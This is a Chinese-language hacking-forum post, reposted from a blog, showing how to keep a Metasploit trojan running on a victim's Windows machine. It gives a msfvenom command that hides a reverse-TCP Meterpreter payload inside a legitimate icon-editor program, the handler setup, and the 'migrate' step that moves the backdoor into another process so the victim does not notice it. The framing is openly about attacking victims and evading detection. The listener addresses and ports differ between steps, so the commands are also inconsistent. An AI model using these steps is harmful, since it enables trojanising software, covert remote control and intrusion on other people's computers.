跳转到帖子
  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

msfconsole中怎么转移进程


Ken1Ve

推荐的帖子

在利用msf进行渗透测试时,或者我们将我们自己的木马发送给受害者时,由于我们的木马是临时性的,不能很好的保持持久在线,导致渗透过程失败。那么我们该如何解决这一问题呢!其实方法也很简单,我们只需要将木马的进程转移到其他的程序上即可。这样做一来是防止受害者发现可疑进程而关闭后门程序,二是可以有效的保持木马在线。

首先我们生成一个木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.209 LPORT=4444 -x 图标修改器.exe -e x86/33 -f exe -o yue.exe

如上我们在一个正常的软件图标修改器.exe加入了后门,当受害者运行该软件时,我们则会获得shell。

启动msfconsole并设置参数

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.232.195
set LPORT 5555
exploit

运行软件,成功获得shell
11.png

转移进程

首先命令ps查看当前windows下运行的进程有哪些。
22.png
这时,我们要记录下要转移程序的pid
比如,我想我木马的进程转移到txt文档程序下。执行下面命令。

migrate 6296

333.png

使用 espia

use espia

55.png
这样我们将原来的木马进程转移到了windonds自带的应用程序上。操作更简单,装逼更安全。


版权属于:逍遥子大表哥

本文链接:https://blog.bbskali.cn/531.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

链接帖子
意见的链接
分享到其他网站

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    • 最近浏览   0位会员

      • 没有会员查看此页面。
    ×
    ×
    • 创建新的...